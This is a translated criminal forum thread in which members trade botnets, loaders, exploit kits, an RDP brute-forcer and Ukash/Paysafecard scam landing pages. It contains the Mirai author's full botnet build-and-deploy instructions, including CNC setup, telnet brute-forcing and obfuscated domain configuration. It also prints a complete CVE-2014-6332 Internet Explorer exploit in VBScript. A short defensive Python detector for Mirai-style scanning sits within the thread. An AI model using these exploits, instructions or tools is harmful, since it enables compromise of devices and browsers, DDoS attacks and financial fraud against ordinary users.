
Public botnets and exploit packs: post them here

Thread in the "Botnets. Exploit packs. Loads" section, created by user ohotnik, 11 Jul 2016.

  1. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0
  2. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0
    Gaudox Loader
  3. 500ise

    500ise Member

    Messages:
    39
    Likes:
    0
    I'm interested in Android bots; does anyone have a decent public one? Just to play around, so to speak.
  4. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0

    AVG Free : Clean
    Avast : Clean
    AntiVir (Avira) : Clean
    BitDefender : Clean
    Clam Antivirus : Clean
    COMODO Internet Security : Clean
    Dr.Web : Clean
    eTrust-Vet : Clean
    F-PROT Antivirus : Clean
    F-Secure Internet Security : Clean
    G Data : Clean
    IKARUS Security : Clean
    Kaspersky Antivirus : Clean
    McAfee : Clean
    MS Security Essentials : Clean
    ESET NOD32 : Clean
    Norman : Clean
    Norton Antivirus : Clean
    Panda Security : Clean
    A-Squared : Clean
    Quick Heal Antivirus : Clean
    Solo Antivirus : Clean
    Sophos : Clean
    Trend Micro Internet Security : Clean
    VBA32 Antivirus : Clean
    Zoner AntiVirus : Clean
    Ad-Aware : Clean
    BullGuard : Clean
    FortiClient : Clean
    K7 Ultimate : Clean
    NANO Antivirus : Clean
    Panda CMD : Clean
    VIPRE : Clean
    SUPERAntiSpyware : Clean
    Twister Antivirus : Clean
  5. mtd

    mtd Member

    Messages:
    35
    Likes:
    0
    The Gaudox Loader archive is corrupted, can you re-upload it?
  6. Zalypa

    Zalypa Member

    Messages:
    39
    Likes:
    0
    Please re-upload the loader
  7. Ares

    Ares Member VIP

    Messages:
    40
    Likes:
    12
    Re-upload Gaudox. I'd be grateful
  8. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0
    Landing pages for collecting Ukash and Paysafecard, for 45 countries, in 45 languages


    Added 1 minute 57 seconds later
    Hunter exploit kit


    Added 3 minutes 53 seconds later
    SafeLoader

    Added 10 minutes 21 seconds later
    NLBrute - RDP (NLA)
  9. demon

    demon New Member

    Messages:
    6
    Likes:
    0
    Mirai bot (source)


    + instructions for creating a botnet
    ============================
    Greetz everybody,

    When I first go in DDoS industry, I wasn’t planning on staying in it long. I made my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I know every skid and their mama, it’s their wet dream to have something besides qbot.

    So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

    So, I am your senpai, and I will treat you real nice, my hf-chan.

    And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

    Also, shoutout to this blog post by malwaremustdie

    - backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
    Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. «We still have better kung fu than you kiddos» don’t make me laugh please, you made so many mistakes and even confused some different binaries with my. LOL

    Let me give you some slaps back —
    1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
    2) /dev/watchdog and /dev/misc are not for «making the delay», it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
    3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol «And doing the backdoor to connect via HTTP on 65.222.202.53». you got tripped up by signal flow wink.gif try harder skiddo
    4) Your skeleton tool sucks ass, it thought the attack decoder was «sinden style», but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
    5) you say ‘chroot(«/») so predictable like torlus’ but you don’t understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

    5 slaps for you

    Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you «beat me» with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.

    Just as I forever be free, you will be doomed to mediocracy forever.

    Requirements
    2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

    OP Requirements
    2 VPS and 4 servers
    — 1 VPS with extremely bulletproof host for database server
    — 1 VPS, rootkitted, for scanReceiver and distributor
    — 1 server for CNC (used like 2% CPU with 400k bots)
    — 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

    — To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
    — Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding bruted result, bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
    — Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utility scanListen binary appear in debug folder.

    Mirai uses a spreading mechanism similar to self-rep, but what I call «real-time-load». Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

    The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections — in theory, this value lot less). I would have maybe 60k — 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
    Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

    — TABLE_CNC_DOMAIN — Domain name of CNC to connect to — DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards smile.gif
    — TABLE_CNC_PORT — Port to connect to, its set to 23 already
    — TABLE_SCAN_CB_DOMAIN — When finding bruted results, this domain it is reported to
    — TABLE_SCAN_CB_PORT — Port to connect to for bruted results, it is set to 48101 already.

    In ./mirai/tools you will find something called enc.c — You must compile this to output things to put in the table.c file

    Run this inside mirai directory

    ./build.sh debug telnet

    You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won’t affect compiling the enc tool

    Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

    ./debug/enc string fuck.the.police.com
    The output should look like this

    XOR’ing 20 bytes of data…
    x44x57x41x49x0Cx56x4Ax47x0Cx52x4Dx4Ex 4Bx41x47x0Cx41x4Dx4Fx22
    To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see «XOR’ing 20 bytes of data». This value must replace the last argument as well. So for example, the table.c line originally looks like this
    add_entry(TABLE_CNC_DOMAIN, «x41x4Cx41x0Cx41x4Ax43x4Cx45x47x4Fx47 x0Cx41x4Dx4Fx22», 30); // cnc.changeme.com
    Now that we know value from enc tool, we update it like this

    add_entry(TABLE_CNC_DOMAIN, «x44x57x41x49x0Cx56x4Ax47x0Cx52x4Dx4E x4Bx41x47x0Cx41x4Dx4Fx22″, 20); // fuck.the.police.com
    Some values are strings, some are port (uint16 in network order / big endian).
    CONFIGURE THE CNC:
    apt-get install mysql-server mysql-client

    CNC requires database to work. When you install database, go into it and run following commands:


    This will create database for you. To add your user,

    INSERT INTO users VALUES (NULL, ‘anna-senpai’, ‘myawesomepassword’, 0, 0, 0, 0, -1, 1, 30, »);
    Now, go into file ./mirai/cnc/main.go

    Edit these values
    const DatabaseAddr string = «127.0.0.1»
    const DatabaseUser string = «root»
    const DatabasePass string = «password»
    const DatabaseTable string = «mirai»
    To the information for the mysql server you just installed

    Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.


    The CNC, bot, and related tools:

    How to build bot + CNC
    In mirai folder, there is build.sh script.
    ./build.sh debug telnet

    Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
    ./build.sh release telnet

    Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: «mirai.$ARCH» to ./mirai/release folder

    Loader reads telnet entries from STDIN in following format:
    ip:port user:pass
    It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget.
    ./build.sh

    Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this
    cat file.txt | ./loader
    Remember to ulimit!

    Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like «My bot not connect, fix it»

    #FREEAPPLEJ4CK
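
A defender-side sketch of the network behaviour the post above describes (unanswered SYN scanning of telnet, then reporting results on port 48101), added here as an example; it is not part of the original thread or of the Mirai code. The flow-record format, the window and threshold values, and all addresses are constructed assumptions.

```python
from collections import defaultdict

TELNET_PORT = 23        # service the post says the bots brute-force
REPORT_PORT = 48101     # default port for reported results, per the post
WINDOW = 60             # seconds per counting window (assumed value)
FANOUT_THRESHOLD = 20   # distinct telnet targets per window (assumed value)

def sample_flows():
    """Constructed flow records: 'epoch src dst dport tcp_flags_seen'."""
    flows = [f"{1000 + i // 4} 10.0.5.20 198.51.100.{i + 1} 23 S"
             for i in range(40)]                             # unanswered SYNs
    flows.append("1010 10.0.5.20 203.0.113.9 48101 SAPF")    # result report
    flows.append("1005 10.0.5.31 192.0.2.10 23 SAPF")        # one admin session
    flows += [f"1002 10.0.5.44 192.0.2.{i} 23 S" for i in range(1, 4)]
    flows.append("garbage line")                             # must be skipped
    return flows

def parse(lines):
    for line in lines:
        parts = line.split()
        if len(parts) != 5 or not (parts[0].isdigit() and parts[3].isdigit()):
            continue  # tolerate malformed records instead of crashing
        yield int(parts[0]), parts[1], parts[2], int(parts[3]), parts[4]

def detect(lines):
    """Return {src: [reasons]} for hosts showing the behaviour described."""
    syn_targets = defaultdict(lambda: defaultdict(set))  # src -> window -> dsts
    reports = defaultdict(set)                            # src -> report dsts
    for ts, src, dst, dport, flags in parse(lines):
        if dport == TELNET_PORT and flags == "S":
            syn_targets[src][ts // WINDOW].add(dst)
        elif dport == REPORT_PORT:
            reports[src].add(dst)
    findings = {}
    for src in sorted(set(syn_targets) | set(reports)):
        peak = max((len(d) for d in syn_targets[src].values()), default=0)
        reasons = []
        if peak >= FANOUT_THRESHOLD:
            reasons.append(f"telnet-scan:{peak}")
        if reports[src]:
            reasons.append(f"report-{REPORT_PORT}:" + ",".join(sorted(reports[src])))
        if reasons:
            findings[src] = reasons
    return findings

if __name__ == "__main__":
    for host, why in detect(sample_flows()).items():
        print(host, why)
```

Point 1 of the post says port 48101 is also used on the device for single-instance control, so a local listener on that port is a host-side check to pair with this network-side one.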
  10. Nikolas

    Nikolas New Member

    Messages:
    7
    Likes:
    0
    ohotnik, could you please send the password for the NLBrute - RDP (NLA) archive?
  11. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0
    0day exploit
    Literally all browsers are affected by the bug: Google Chrome, Opera, Safari, MS Internet Explorer and even MS Edge.

    [flash]CVE-2015-0349

    Added 8 minutes 50 seconds later
    CVE-2014-6332 Exploit (IE all version exploit)
    //*
    allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.



    *//

    <!doctype html>
    <html>
    <meta http-equiv=X-UA-Compatible content=IE=EmulateIE8 >
    <head>
    </head>
    <body>

    <SCRIPT LANGUAGE=VBScript>

    function runmumaa()
    On Error Resume Next
    set shell=createobject(Shell.Application)
    shell.ShellExecute notepad.exe
    end function

    </script>

    <SCRIPT LANGUAGE=VBScript>
    dim aa()
    dim ab()
    dim a0
    dim a1
    dim a2
    dim a3
    dim win9x
    dim intVersion
    dim rnda
    dim funclass
    dim myarray

    Begin()

    function Begin()
    On Error Resume Next
    info=Navigator.UserAgent

    if(instr(info,Win64)>0) then
    exit function
    end if

    if (instr(info,MSIE)>0) then
    intVersion = CInt(Mid(info, InStr(info, MSIE) + 5, 2))
    else
    exit function

    end if

    win9x=0

    BeginInit()
    If Create()=True Then
    myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chr w(00)&chrw(00)&chrw(00)
    myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw (0)

    if(intVersion<4) then
    document.write(<br> IE)
    document.write(intVersion)
    runshellcode()
    else
    setnotsafemode()
    end if
    end if
    end function

    function BeginInit()
    Randomize()
    redim aa(5)
    redim ab(5)
    a0=13+17*rnd(6)
    a3=7+3*rnd(5)
    end function

    function Create()
    On Error Resume Next
    dim i
    Create=False
    For i = 0 To 400
    If Over()=True Then
    document.write(i)
    Create=True
    Exit For
    End If
    Next
    end function

    sub testaa()
    end sub

    function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim Preserve aa(a2)

    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314

    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim Preserve aa(a0)
    end function


    function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
    j=0
    redim Preserve aa(a2)
    aa(a1+2)(i+&h11c+k)=ab(4)
    redim Preserve aa(a0)

    j=0
    j=readmemo(i+&h120+k)

    Exit for
    end if

    next
    ab(2)=1.69759663316747E-313
    runmumaa()
    end function

    function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim Preserve aa(a0)
    redim ab(a0)

    redim Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
    if(intVersion<4) then
    mem=cint(a0+1)*16
    j=vartype(aa(a1-1))
    if((j=mem+4) or (j*8=mem+8)) then
    if(vartype(aa(a1-1))<>0) Then
    If(IsObject(aa(a1)) = False ) Then
    type1=VarType(aa(a1))
    end if
    end if
    else
    redim Preserve aa(a0)
    exit function

    end if
    else
    if(vartype(aa(a1-1))<>0) Then
    If(IsObject(aa(a1)) = False ) Then
    type1=VarType(aa(a1))
    end if
    end if
    end if
    end if


    If(type1=&h2f66) Then
    Over=True
    End If
    If(type1=&hB9AD) Then
    Over=True
    win9x=1
    End If

    redim Preserve aa(a0)

    end function

    function ReadMemo(add)
    On Error Resume Next
    redim Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))

    ab(0)=0
    redim Preserve aa(a0)
    end function

    </script>

    </body>
    </html>
  12. b m

    b m New Member

    Messages:
    26
    Likes:
    0
    Post something for beginner hackers and a manual on how to install it. I'd be grateful.
    I want to control 100-200 bots for myself, preferably with VNC and SOCKS.
  13. axxxe

    axxxe New Member

    Messages:
    8
    Likes:
    0
    What's the key, bro?

    Added 8 minutes 30 seconds later
    I'd be glad of something with those specs too) I'd dig around in it

  14. LiTos

    LiTos New Member

    Messages:
    2
    Likes:
    0
    Well, you could at least write something for newbies; I'm staring at this like a fool and don't understand what these programs are. Do I need to download all of them? What is each one for? Do I have to use all the programs? How do I install them? So many questions..... It feels like the site just wants visits and nothing more; what's the advertising on the other board for?
  15. CrazyPrinter

    CrazyPrinter Member

    Messages:
    404
    Likes:
    0
    Well, you could at least write something for newbies; I'm staring at this like a fool and don't understand what these programs are.
    These are programs for gamers. Some boost gold, some boost health and mana. But there aren't any such programs yet for Dota and other popular games, so go back to your own forum.
  16. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0
    Re-uploaded the Gaudox HTTP loader
  17. albaniri

    albaniri New Member

    Messages:
    25
    Likes:
    1
    It doesn't check in, damn it
  18. EarlCoin

    EarlCoin New Member

    Messages:
    8
    Likes:
    0
    Looking for a bot for ARM/MIPS architectures, running Linux. Does anyone know of anything still alive?
  19. ohotnik

    ohotnik Member

    Messages:
    183
    Likes:
    0
    Socket bot, Brute-Force, WP, Joomla, SMTP, Email
    Download:
    40mb uncompressed, license key included
  20. Zoman29

    Zoman29 Member

    Messages:
    31
    Likes:
    0
    Does anyone have SpyEye?)
